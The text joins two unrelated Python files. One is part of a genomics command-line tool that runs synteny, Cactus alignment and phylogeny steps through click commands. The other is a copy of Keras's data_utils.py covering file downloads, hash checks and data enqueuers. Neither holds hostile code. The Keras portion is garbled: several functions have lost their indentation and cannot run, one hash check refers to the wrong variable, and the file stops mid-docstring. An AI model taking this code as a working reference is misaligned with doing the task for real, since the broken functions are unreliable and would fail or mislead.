@click.option('-gff', '--gff_path', default = './gff_path/', show_default=True, help='Gff path containing all of the gff/gff3 files. Gff naming must conform to: xxx.[protID].[gff/gff3].', type=click.Path(exists=False))
@click.option('-s', '--synteny_path', default = './synteny_path/', show_default=True, help='Path containing synteny files, .unout or .anchors files. *.unout must conform to following pattern: [PAC4GC/PAC2_0].[q_protID]-[PAC4GC/PAC2_0].[s_protID]_5.unout; *.anchors must conform to: [q_protID].[s_protID].[*].anchors. Not neccessary to add files to this path, synteny will be generated if no specification.', type=click.Path(exists=False))
@click.option('-bed', '--bed_path', default = './bed_path/', show_default=True, help='Bed path containing all of the bed files.', type=click.Path(exists=False))
@click.option('-ci', '--circos_inputs', default = './circos_inputs/', show_default=True, help='Path containing all of circos inputs and configuration files.', type=click.Path(exists=False))
@click.option('-co', '--circos_outputs', default = './circos_outputs/', show_default=True, help='Path containing all of circos output images.', type=click.Path(exists=False))
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-info', '--gene_info', default = 'Name', show_default=True, help='Naming convention for gff file\'s gene name field.', type=click.Choice(['Name', 'gene_name']))
@click.option('-n', '--n_cpus', default = 16, show_default=True, help='Number of cpus used to convert hal 2 maf files.')
def circos_dropper(fasta_path, gff_path, synteny_path, bed_path, circos_inputs, circos_outputs, loci_threshold,gene_info, n_cpus):
	"""Visualize many pairwise synteny results. If synteny files are not supplied, conduct pairwise synteny between all included strains."""
	# Index fasta files by protID: second-to-last '_'-separated field of the filename.
	fasta_files = {fasta.split('_')[-2] : fasta for fasta in glob.glob(fasta_path+'/*.fa')+glob.glob(fasta_path+'/*.fasta')}
	# Index gff files by protID: second-to-last '.'-separated field of the filename.
	gff_files = {gff.split('.')[-2] : gff for gff in glob.glob(gff_path+'/*.gff')+glob.glob(gff_path+'/*.gff3') }
	# Only protIDs that have BOTH a fasta and a gff are usable.
	intersect_keys = set(fasta_files.keys()) & set(gff_files.keys())
	fasta_files = {protID:fasta for protID,fasta in fasta_files.items() if protID in intersect_keys}
	gff_files = {protID:gff for protID,gff in gff_files.items() if protID in intersect_keys}
	genomes = {}
	pairwise_syntenies = []
	print gff_files, fasta_files
	# Build one Genome object per strain and emit its circos karyotype file.
	for protID in intersect_keys:
		genomes[protID] = Genome(fasta_files[protID],bed_path+'/'+protID+'.bed',protID,gff_files[protID],gene_info)
		genomes[protID].export_karyotype(circos_inputs+'/'+protID+'.karyotype.txt')
	print genomes
	synteny_files = glob.glob(synteny_path+'/*.unout')+glob.glob(synteny_path+'/*.lifted.anchors')
	synteny_protIDs = []
	if synteny_files:
		# Reuse precomputed synteny files; recover (query, subject) protIDs from the filename.
		for synteny_file in synteny_files:
			if synteny_file.endswith('.unout'):
				# protIDs sit 1-4 chars after the end of each PAC2_0/PAC4GC tag;
				# keep every other match boundary (the end offsets) via [1::2].
				coords = reduce(lambda x,y: x+y, sorted([[m.start(0),m.end(0)] for m in re.finditer('PAC2_0|PAC4GC',synteny_file)]))[1::2]
				q_protID, s_prot_ID = map(lambda x: synteny_file[x+1:x+4],coords)
			else:
				# .lifted.anchors files are named [q_protID].[s_protID].[*].anchors
				q_protID, s_prot_ID = tuple(synteny_file[synteny_file.rfind('/')+1:].split('.')[:2])
			# Record both orderings so the set difference below catches either orientation.
			synteny_protIDs.extend([(q_protID, s_prot_ID),(s_prot_ID, q_protID)])
			pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],synteny_file,loci_threshold=loci_threshold)
			pairwise_synteny.generate_synteny_structure(synteny_path)
			pairwise_syntenies.append(pairwise_synteny)
		# Pairs that still need synteny computed from scratch.
		remaining_synteny = set(list(combinations(intersect_keys,r=2))) - set(synteny_protIDs)
	else:
		remaining_synteny = list(combinations(intersect_keys,r=2))
	if remaining_synteny:
		#print remaining_synteny
		# Extract CDS for every genome involved in a missing pair (parallelized below).
		def generate_CDS(protID):
			print(protID)
			genomes[protID].extract_CDS()
			return protID
		p = mp.ProcessingPool(n_cpus)
		r = p.amap(generate_CDS,list(set(reduce(lambda x,y: list(x)+list(y),remaining_synteny))))
		r.wait()
		protIDs = r.get()
		print(protIDs)
		#p = mp.ProcessingPool(ncpus=n_cpus)
		#p.daemon = True
		#r = p.amap(generate_CDS,list(set(reduce(lambda x,y: list(x)+list(y),remaining_synteny)))) # get pathos multiprocessing https://github.com/uqfoundation/pathos
		#while not r.ready():
		#    sleep(5)
		#r.wait()
		"""
		for protID in set(reduce(lambda x,y: list(x)+list(y),remaining_synteny)):
			proc = mp.Process(target=lambda: genomes[protID].extract_CDS, args=None)
			proc.daemon = True
			proc.start()
		while len(mp.active_childern()) > n_cpus:
			sleep(1)
		while len(mp.active_childern()) > 0:
			sleep(1)"""
		# fixme add remaining prot ID feauture
		#def mycallback(x):
		#    pairwise_syntenies.extend(x)
		# Worker: compute synteny structure for one (query, subject) protID pair.
		def p_synteny(protIDs):
			print(protIDs)
			q_protID, s_prot_ID = protIDs
			pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],loci_threshold=loci_threshold)
			pairwise_synteny.generate_synteny_structure(synteny_path)
			return pairwise_synteny
		"""
		for q_protID, s_prot_ID in combinations(genomes.keys(),r=2):
			pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],loci_threshold=loci_threshold)
			pairwise_synteny.generate_synteny_structure(synteny_path)
			pairwise_syntenies.append(pairwise_synteny)"""
		r = p.amap(p_synteny,remaining_synteny)#,callback=mycallback) # _async
		r.wait()
		pairwise_syntenies.extend(r.get())
		p.close()
	# One link file + circos render per pairwise synteny.
	for pairwise_synteny in pairwise_syntenies:
		pairwise_synteny.synteny_structure_2_link(circos_inputs+'/%s.%s.link.txt'%(pairwise_synteny.q_genome.protID,pairwise_synteny.s_genome.protID))
		circos_obj = Circos(pairwise_synteny)
		circos_obj.generate_config(ticks = circos_inputs+'/txticks.conf', ideogram = circos_inputs+'/txideogram.conf', links_and_rules = circos_inputs+'/linksAndrules.conf', config=circos_inputs+'/circos.conf')
		circos_obj.run_circos(circos_outputs+'/')
#####################################
#### PAIRWISE SEQUENCE ALIGNMENT ####
@joshuatree.command()
@click.option('-f1', default = './genome1.fa', show_default=True, help='Path containing fasta file one.', type=click.Path(exists=False))
@click.option('-f2', default = './genome2.fa', show_default=True, help='Path containing fasta file two.', type=click.Path(exists=False))
@click.option('-maf', '--out_file', default = './output.maf', show_default=True, help='Output in maf format.', type=click.Path(exists=False))
def pairwise_alignment(f1,f2, out_file):
	"""Compute pairwise alignment between two genomes."""
	# Index both fastas with samtools, then align them with lastz and write MAF output.
	command = "samtools faidx %s && samtools faidx %s && lastz --format=maf %s %s > %s"%(f1,f2,f1,f2,out_file)
	subprocess.call(command,shell=True)
####################
#### RUN CACTUS ####
@joshuatree.command()
@click.option('-fo', '--fasta_output_path', default = './fasta_output/', show_default=True, help='Path containing all syntenic aligned regions, organized into fasta files for multiple sequence alignment via Cactus.', type=click.Path(exists=False))
@click.option('-c', '--cactus_run_directory', default = './cactus_run/', show_default=True, help='Directory containing cactus run information.', type=click.Path(exists=False))
@click.option('-cac', '--cactus_softlink', default = './runProgressiveCactus/', show_default=True, help='Name of softlinked Progressive Cactus distribution.', type=click.Path(exists=False))
@click.option('-n', '--n_cpus', default = 16, show_default=True, help='Number of cpus used to convert hal 2 maf files.')
@click.option('-h2m', '--hal2maf_softlink', default = './hal2maf', show_default=True, help='Name of softlinked Progressive Cactus hal2maf program.', type=click.Path(exists=False))
# FIX: this option previously reused the short flag '-h2m', colliding with
# --hal2maf_softlink above (the later declaration shadowed the earlier one).
@click.option('-nick', '--nickname_file', default = '', show_default=True, help='File containing protID nickname in each line for all protIDs, can omit this file by leaving it blank.', type=click.Path(exists=False))
@click.option('-fi', '--fasta_path', default = './fasta_path/', show_default=True, help='Fasta path containing all of the input genomes. Genome naming must conform to xxx_[protID]_xxx.[fa/fasta].', type=click.Path(exists=False))
@click.option('-s', '--submission_system', default = 'local', show_default=True, help='Different nextflow submission system to use.', type=click.Choice(['local','sge','slurm']))
@click.option('-shift', '--shifter', is_flag = True, help='Use shifter instead of docker.')
def run_cactus(fasta_output_path,cactus_run_directory,cactus_softlink, n_cpus, hal2maf_softlink, nickname_file, fasta_path, submission_system, shifter):
	"""Run multiple sequence alignment via Progressive Cactus on multiple species synteny blocks and export as maf files. Try to run softlink_cactus beforehand, else use official cactus paths instead of softlinks."""
	cactus_run_obj = CactusRun(fasta_output_path,cactus_run_directory,cactus_softlink, nickname_file, fasta_path)
	# Write per-block fasta/seq files, run the alignment, then convert hal output to maf.
	cactus_run_obj.write_fastas_seqfile()
	cactus_run_obj.run_cactus(submission_system, shifter=shifter)
	cactus_run_obj.hal2maf(n_cpus, hal2maf_softlink)
@joshuatree.command()
@click.option('-cd', '--cactus_distribution_dir', default = './progressiveCactus/', show_default=True, help='Path containing installed Progressive Cactus Distribution.', type=click.Path(exists=False))
@click.option('-cac', '--softlink_cactus_name', default = './runProgressiveCactus', show_default=True, help='Name of softlinked Progressive Cactus distribution.', type=click.Path(exists=False))
@click.option('-h2m', '--softlink_hal2maf_name', default = './hal2maf', show_default=True, help='Name of softlinked Progressive Cactus hal2maf program.', type=click.Path(exists=False))
def softlink_cactus(cactus_distribution_dir,softlink_cactus_name, softlink_hal2maf_name):
	"""Softlink cactus distribution's cactus bash script, virtual environment, and hal2maf program. Useful if installed Cactus to particular directory and want to save time in referencing that directory when running cactus."""
	# Create one symlink for the distribution itself and one for the hal2maf helper.
	link_targets = [(os.path.abspath(cactus_distribution_dir), softlink_cactus_name),
					(os.path.abspath(cactus_distribution_dir+'/submodules/hal/bin/hal2mafMP.py'), softlink_hal2maf_name)]
	for target, link_name in link_targets:
		subprocess.call('ln -s %s %s'%(target,link_name),shell=True)
@joshuatree.command()
@click.option('-i','--install_path', help='Install Path.', type=click.Path(exists=False))
def install_cactus(install_path):
	"""Install the Cactus distribution and hal tools.""" # fixme, make sure hal tools works
	os.chdir(install_path)
	# Name of the active conda environment; captured but not used further yet.
	conda_env = os.popen('echo $CONDA_PREFIX').read().split('/')[-1]
	# Clone progressiveCactus (with submodules) and build it in place.
	install_script = 'git config --global --add http.sslVersion tlsv1.2\ngit clone git://github.com/glennhickey/progressiveCactus.git\ncd progressiveCactus\ngit pull\ngit submodule update --init\nmake'
	subprocess.call(install_script,shell=True)
# fixme, functions to add, nextflow progressiveCactus executor, move maf to new folder, visualize CS, breakdown into CNS elements, extract vcf, local PCA, local Trees, run iqtree, plottree, visualize tree with ete3, merge/intersect vcf, mafstrander, maffilter, vcf to snp matrix, plotPositions and all associated tools,
# fixme anything with vcf or SNPs should be one class; convert mafobject to vcf object, vcf2tab inside vcf object
# fixme main ideas extract vcf, CNS, visualize snps and cns, chrom spatial and PCA, compute phylogeny via SNPs, local tree topology, vcf operations,
####################
#### fixme add commands with snps and maf ####
####################
#### MAF Commands
####################
#### VCF Commands
####################
#### Tree Commands
####################
#### Local Tree Topology + Local PCA
@joshuatree.command()
@click.option('-vcf','--vcf_file', help='Input vcf file.', type=click.Path(exists=False))
@click.option('-i','--snps_interval', default = 4000, show_default=True, help='How many snps to use per localized window.', type=click.Path(exists=False))
@click.option('-phy','--phylogeny', default='iqtree', show_default=True, help='Phylogenetic analysis to use.', type=click.Choice(['iqtree','phyml','fasttree']))
@click.option('-w','--work_dir', default = './', show_default = True, help='Work directory for local tree analysis.', type=click.Path(exists=False))
def run_local_trees(vcf_file,snps_interval, phylogeny, work_dir):
	"""Infer local phylogenies over fixed-size SNP windows taken from a vcf file."""
	SNP(vcf_file).run_local_trees(snps_interval, phylogeny, work_dir)
@joshuatree.command()
@click.option('-vcf','--vcf_file', help='Input vcf file.', type=click.Path(exists=False))
@click.option('-tab','--tab_file', default='out.tab', show_default=True, help='Output tab file.', type=click.Path(exists=False))
def vcf2tab(vcf_file, tab_file):
	"""Convert a vcf file into tab-delimited SNP format."""
	SNP(vcf_file).vcf2tab(tab_file)
@joshuatree.command()
@click.option('-tab','--tab_file', default='in.tab', show_default=True, help='Input tab file.', type=click.Path(exists=False))
@click.option('-i','--snp_interval', default = 4000, show_default=True, help='How many snps to use per localized window.', type=click.Path(exists=False))
@click.option('-o', '--write_file', default = './output.trees', show_default=True, help='File to write information on local fasta file chunks from local SNPs.',type=click.Path(exists=False))
def tab2chunks(tab_file, snp_interval, write_file):
	"""Split a tab-format SNP matrix into local windows and record the chunk metadata."""
	SNP(tab_file,'tab').tab2chunks(tab_file,snp_interval, write_file)
@joshuatree.command()
@click.option('-f','--fasta_file', default='in.fasta', show_default=True, help='Input fasta file.', type=click.Path(exists=False))
@click.option('-p','--phylogeny', default='iqtree', show_default=True, help='Phylogenetic analysis to use.', type=click.Choice(['iqtree','phyml','fasttree']))
@click.option('-t','--tree_file', default = './out.treefile', show_default=True, help='Output tree file, newick format.', type=click.Path(exists=False))
def generate_phylogeny(fasta_file, phylogeny, tree_file):
	"""Build a newick phylogeny from a fasta alignment with the chosen tool (GTR model, single bootstrap, one thread)."""
	alignment = fasta_aln(fasta_file)
	alignment.generate_tree(phylogeny, tree_out = tree_file, model='GTR',bootstrap=1, n_threads = '1')
@joshuatree.command()
@click.option('-t','--tree_file', default = './in.treefile', show_default=True, help='Input tree file, newick format.', type=click.Path(exists=False))
@click.option('-i','--interval', default = '', show_default=True, help='Bed interval of tree, delimited by underscore.', type=click.Path(exists=False))
@click.option('-o','--out_file', default = 'out.interval', show_default=True, help='Output file containing interval and tree', type=click.Path(exists=False))
def write_trees_intervals(tree_file,interval, out_file):
	"""Pair a newick tree with its genomic interval and write both to out_file."""
	tree = TreeObj(tree_file)
	tree.write_trees_intervals(interval, out_file)
@joshuatree.command()
@click.option('-t','--trees_file', default = './in.treesfile', show_default=True, help='Input trees file, containing intervals and trees.', type=click.Path(exists=False))
@click.option('-w','--work_dir', default = './', show_default = True, help='Work directory for local tree analysis.', type=click.Path(exists=False))
def local_trees2final_output(trees_file,work_dir):
	"""Aggregate per-interval local trees into the final analysis output under work_dir."""
	trees = TreeObj(trees_file)
	trees.local_trees2final_output(work_dir)
#### RUN CLI ####
# Entry point: dispatch to the joshuatree click command group.
if __name__ == '__main__':
	joshuatree()
|
data_utils.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import abstractmethod
from contextlib import closing
import hashlib
import multiprocessing
from multiprocessing.pool import ThreadPool
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import traceback
import zipfile
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.util.tf_export import tf_export
try:
import queue
except ImportError:
import Queue as queue
# Python 2 lacks a proxy-safe urlretrieve; provide a replacement built on
# urlopen. Python 3 uses the stdlib implementation re-exported via six.
if sys.version_info[0] == 2:
  def urlretrieve(url, filename, reporthook=None, data=None):
    """Replacement for `urlretrieve` for Python 2.
    Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
    `urllib` module, known to have issues with proxy management.
    Arguments:
        url: url to retrieve.
        filename: where to store the retrieved data locally.
        reporthook: a hook function that will be called once
            on establishment of the network connection and once
            after each block read thereafter.
            The hook will be passed three arguments;
            a count of blocks transferred so far,
            a block size in bytes, and the total size of the file.
        data: `data` argument passed to `urlopen`.
    """
    def chunk_read(response, chunk_size=8192, reporthook=None):
      # NOTE: reads the total size from the 'Content-Length' header;
      # -1 signals "unknown size" to the reporthook.
      content_type = response.info().get('Content-Length')
      total_size = -1
      if content_type is not None:
        total_size = int(content_type.strip())
      count = 0
      while True:
        chunk = response.read(chunk_size)
        count += 1
        if reporthook is not None:
          reporthook(count, chunk_size, total_size)
        if chunk:
          yield chunk
        else:
          break

    response = urlopen(url, data)
    with open(filename, 'wb') as fd:
      for chunk in chunk_read(response, reporthook=reporthook):
        fd.write(chunk)
else:
  from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Arguments:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format is 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type is 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type is 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@tf_export('keras.utils.get_file')
def get_file(fname,
             origin,
             untar=False,
             md5_hash=None,
             file_hash=None,
             cache_subdir='datasets',
             hash_algorithm='auto',
             extract=False,
             archive_format='auto',
             cache_dir=None):
  """Downloads a file from a URL if it is not already in the cache.

  By default the file at the url `origin` is downloaded to the
  cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
  and given the filename `fname`. The final location of a file
  `example.txt` would therefore be `~/.keras/datasets/example.txt`.
  Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
  Passing a hash will verify the file after download. The command line
  programs `shasum` and `sha256sum` can compute the hash.

  Arguments:
      fname: Name of the file. If an absolute path `/path/to/file.txt` is
          specified the file will be saved at that location.
      origin: Original URL of the file.
      untar: Deprecated in favor of 'extract'.
          boolean, whether the file should be decompressed
      md5_hash: Deprecated in favor of 'file_hash'.
          md5 hash of the file for verification
      file_hash: The expected hash string of the file after download.
          The sha256 and md5 hash algorithms are both supported.
      cache_subdir: Subdirectory under the Keras cache dir where the file is
          saved. If an absolute path `/path/to/folder` is
          specified the file will be saved at that location.
      hash_algorithm: Select the hash algorithm to verify the file.
          options are 'md5', 'sha256', and 'auto'.
          The default 'auto' detects the hash algorithm in use.
      extract: True tries extracting the file as an Archive, like tar or zip.
      archive_format: Archive format to try for extracting the file.
          Options are 'auto', 'tar', 'zip', and None.
          'tar' includes tar, tar.gz, and tar.bz files.
          The default 'auto' is ['tar', 'zip'].
          None or an empty list will return no matches found.
      cache_dir: Location to store cached files, when None it
          defaults to the [Keras
          Directory](/faq/#where-is-the-keras-configuration-filed-stored).

  Returns:
      Path to the downloaded file
  """
  if cache_dir is None:
    cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
  # Deprecated md5_hash argument maps onto the file_hash/hash_algorithm pair.
  if md5_hash is not None and file_hash is None:
    file_hash = md5_hash
    hash_algorithm = 'md5'
  datadir_base = os.path.expanduser(cache_dir)
  if not os.access(datadir_base, os.W_OK):
    # Cache dir is not writable; fall back to /tmp.
    datadir_base = os.path.join('/tmp', '.keras')
  datadir = os.path.join(datadir_base, cache_subdir)
  if not os.path.exists(datadir):
    os.makedirs(datadir)
  if untar:
    untar_fpath = os.path.join(datadir, fname)
    fpath = untar_fpath + '.tar.gz'
  else:
    fpath = os.path.join(datadir, fname)
  download = False
  if os.path.exists(fpath):
    # File found; verify integrity if a hash was provided.
    if file_hash is not None:
      if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
        print('A local file was found, but it seems to be '
              'incomplete or outdated because the ' + hash_algorithm +
              ' file hash does not match the original value of ' + file_hash +
              ' so we will re-download the data.')
        download = True
  else:
    download = True

  if download:
    print('Downloading data from', origin)

    class ProgressTracker(object):
      # Maintain progbar for the lifetime of download.
      # This design was chosen for Python 2.7 compatibility.
      progbar = None

    def dl_progress(count, block_size, total_size):
      if ProgressTracker.progbar is None:
        # FIX: compare with `==`, not `is`; identity checks against the int
        # literal -1 rely on CPython small-int caching.
        if total_size == -1:
          total_size = None
        ProgressTracker.progbar = Progbar(total_size)
      else:
        ProgressTracker.progbar.update(count * block_size)

    error_msg = 'URL fetch failure on {}: {} -- {}'
    try:
      try:
        urlretrieve(origin, fpath, dl_progress)
      except URLError as e:
        raise Exception(error_msg.format(origin, e.errno, e.reason))
      except HTTPError as e:
        raise Exception(error_msg.format(origin, e.code, e.msg))
    except (Exception, KeyboardInterrupt):
      # Remove a partial download so a retry starts from a clean state.
      if os.path.exists(fpath):
        os.remove(fpath)
      raise
    ProgressTracker.progbar = None

  if untar:
    if not os.path.exists(untar_fpath):
      _extract_archive(fpath, datadir, archive_format='tar')
    return untar_fpath

  if extract:
    _extract_archive(fpath, datadir, archive_format)

  return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Arguments:
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
  """Validates a file against a sha256 or md5 hash.

  Arguments:
      fpath: path to the file being validated
      file_hash: The expected hash string of the file.
          The sha256 and md5 hash algorithms are both supported.
      algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
          The default 'auto' detects the hash algorithm in use.
      chunk_size: Bytes to read at a time, important for large files.

  Returns:
      Whether the file is valid
  """
  # FIX: compare with `==`, not `is`; identity checks against string and
  # int literals depend on CPython interning/small-int caching.
  # A 64-character expected hash implies sha256; anything else implies md5.
  if (algorithm == 'sha256') or (algorithm == 'auto' and len(file_hash) == 64):
    hasher = 'sha256'
  else:
    hasher = 'md5'
  return str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash)
@tf_export('keras.utils.Sequence')
class Sequence(object):
  """Base object for fitting to a sequence of data, such as a dataset.

  Subclasses must implement `__getitem__` (returning one complete batch)
  and `__len__` (the number of batches). Override `on_epoch_end` to
  modify the dataset between epochs.

  # Notes

  Unlike plain generators, a `Sequence` is safe to consume from multiple
  workers: every sample is guaranteed to be seen exactly once per epoch.

  Examples:

  ```python
  from skimage.io import imread
  from skimage.transform import resize
  import numpy as np
  import math

  # Here, `x_set` is list of path to the images
  # and `y_set` are the associated classes.

  class CIFAR10Sequence(Sequence):

      def __init__(self, x_set, y_set, batch_size):
          self.x, self.y = x_set, y_set
          self.batch_size = batch_size

      def __len__(self):
          return math.ceil(len(self.x) / self.batch_size)

      def __getitem__(self, idx):
          batch_x = self.x[idx * self.batch_size:(idx + 1) *
          self.batch_size]
          batch_y = self.y[idx * self.batch_size:(idx + 1) *
          self.batch_size]

          return np.array([
              resize(imread(file_name), (200, 200))
                 for file_name in batch_x]), np.array(batch_y)
  ```
  """

  @abstractmethod
  def __getitem__(self, index):
    """Gets batch at position `index`.

    Arguments:
        index: position of the batch in the Sequence.

    Returns:
        A batch
    """
    raise NotImplementedError

  @abstractmethod
  def __len__(self):
    """Number of batch in the Sequence.

    Returns:
        The number of batches in the Sequence.
    """
    raise NotImplementedError

  def on_epoch_end(self):
    """Hook called at the end of every epoch; no-op by default."""
    pass

  def __iter__(self):
    """Create an infinite generator that cycles over the batches."""
    while True:
      for idx in range(len(self)):
        yield self[idx]
# Global variables to be shared across processes
# Maps Sequence uid -> Sequence instance; read by get_index() in workers.
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
# Set lazily in OrderedEnqueuer.__init__ (multiprocessing.Value, or a plain
# int when the OS forbids multiprocessing).
_SEQUENCE_COUNTER = None


def init_pool(seqs):
  """Pool initializer: install the shared Sequence registry in the worker."""
  global _SHARED_SEQUENCES
  _SHARED_SEQUENCES = seqs
def get_index(uid, i):
  """Fetch the element at index `i` from the registered Sequence `uid`.

  Several Sequences may be in flight at once (e.g. training and
  validation); keying the shared registry by `uid` keeps them from
  overwriting one another.

  Arguments:
      uid: int, Sequence identifier
      i: index

  Returns:
      The value at index `i`.
  """
  sequence = _SHARED_SEQUENCES[uid]
  return sequence[i]
@tf_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer(object):
  """Abstract base class for parallel input enqueuers.

  An enqueuer speeds up preprocessing by farming work out to threads or
  processes.

  Examples:

  ```python
      enqueuer = SequenceEnqueuer(...)
      enqueuer.start()
      datas = enqueuer.get()
      for data in datas:
          # Use the inputs; training, evaluating, predicting.
          # ... stop sometime.
      enqueuer.close()
  ```

  `enqueuer.get()` yields an endless stream of batches.
  """

  @abstractmethod
  def is_running(self):
    raise NotImplementedError

  @abstractmethod
  def start(self, workers=1, max_queue_size=10):
    """Start the handler's workers.

    Arguments:
        workers: number of worker threads
        max_queue_size: queue size
            (when full, threads could block on `put()`).
    """
    raise NotImplementedError

  @abstractmethod
  def stop(self, timeout=None):
    """Stop the workers and join them; call from the thread that called start().

    Arguments:
        timeout: maximum time to wait on thread.join()
    """
    raise NotImplementedError

  @abstractmethod
  def get(self):
    """Create a generator that pulls data off the queue, skipping `None`s.

    Returns:
        Generator yielding tuples `(inputs, targets)`
            or `(inputs, targets, sample_weights)`.
    """
    raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
    """Builds an Enqueuer from a Sequence.

    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.

    Arguments:
        sequence: A `keras.utils.data_utils.Sequence` object.
        use_multiprocessing: use multiprocessing if True, otherwise threading
        shuffle: whether to shuffle the data at the beginning of each epoch
    """

    def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
        self.sequence = sequence
        self.use_multiprocessing = use_multiprocessing

        # Hand out a unique id per enqueuer so several enqueuers (e.g. one
        # for training and one for validation) can coexist in
        # _SHARED_SEQUENCES without clobbering each other's Sequence.
        global _SEQUENCE_COUNTER
        if _SEQUENCE_COUNTER is None:
            try:
                _SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
            except OSError:
                # In this case the OS does not allow us to use
                # multiprocessing. We resort to an int
                # for enqueuer indexing.
                _SEQUENCE_COUNTER = 0

        if isinstance(_SEQUENCE_COUNTER, int):
            self.uid = _SEQUENCE_COUNTER
            _SEQUENCE_COUNTER += 1
        else:
            # Doing Multiprocessing.Value += x is not process-safe.
            with _SEQUENCE_COUNTER.get_lock():
                self.uid = _SEQUENCE_COUNTER.value
                _SEQUENCE_COUNTER.value += 1

        self.shuffle = shuffle
        self.workers = 0
        self.executor_fn = None
        self.queue = None
        self.run_thread = None
        self.stop_signal = None

    def is_running(self):
        """Return True between `start()` and `stop()`."""
        return self.stop_signal is not None and not self.stop_signal.is_set()

    def start(self, workers=1, max_queue_size=10):
        """Start the handler's workers.

        Arguments:
            workers: number of worker threads
            max_queue_size: queue size
                (when full, workers could block on `put()`)
        """
        if self.use_multiprocessing:
            self.executor_fn = lambda seqs: multiprocessing.Pool(  # pylint: disable=g-long-lambda
                workers, initializer=init_pool, initargs=(seqs,))
        else:
            # We do not need the init since it's threads.
            self.executor_fn = lambda _: ThreadPool(workers)
        self.workers = workers
        self.queue = queue.Queue(max_queue_size)
        self.stop_signal = threading.Event()
        self.run_thread = threading.Thread(target=self._run)
        self.run_thread.daemon = True
        self.run_thread.start()

    def _wait_queue(self):
        """Wait for the queue to be empty."""
        while True:
            time.sleep(0.1)
            if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
                return

    def _run(self):
        """Submits request to the executor and queue the `Future` objects."""
        sequence = list(range(len(self.sequence)))
        self._send_sequence()  # Share the initial sequence
        while True:
            if self.shuffle:
                random.shuffle(sequence)

            with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
                for i in sequence:
                    if self.stop_signal.is_set():
                        return
                    self.queue.put(
                        executor.apply_async(get_index, (self.uid, i)), block=True)

                # Done with the current epoch, waiting for the final batches
                self._wait_queue()

                if self.stop_signal.is_set():
                    # We're done
                    return

            # Call the internal on epoch end.
            self.sequence.on_epoch_end()
            self._send_sequence()  # Update the pool

    def get(self):
        """Creates a generator to extract data from the queue.

        Skip the data if it is `None`.

        Yields:
            The next element in the queue, i.e. a tuple
            `(inputs, targets)` or
            `(inputs, targets, sample_weights)`.
        """
        try:
            while self.is_running():
                inputs = self.queue.get(block=True).get()
                self.queue.task_done()
                if inputs is not None:
                    yield inputs
        except Exception:  # pylint: disable=broad-except
            self.stop()
            # Re-raise the worker's original exception instead of wrapping
            # it in StopIteration: under PEP 479 (Python 3.7+), raising
            # StopIteration inside a generator is converted to a
            # RuntimeError, which would mask the real failure.
            six.reraise(*sys.exc_info())

    def _send_sequence(self):
        """Send current Sequence to all workers."""
        # For new processes that may spawn
        _SHARED_SEQUENCES[self.uid] = self.sequence

    def stop(self, timeout=None):
        """Stops running threads and wait for them to exit, if necessary.

        Should be called by the same thread which called `start()`.
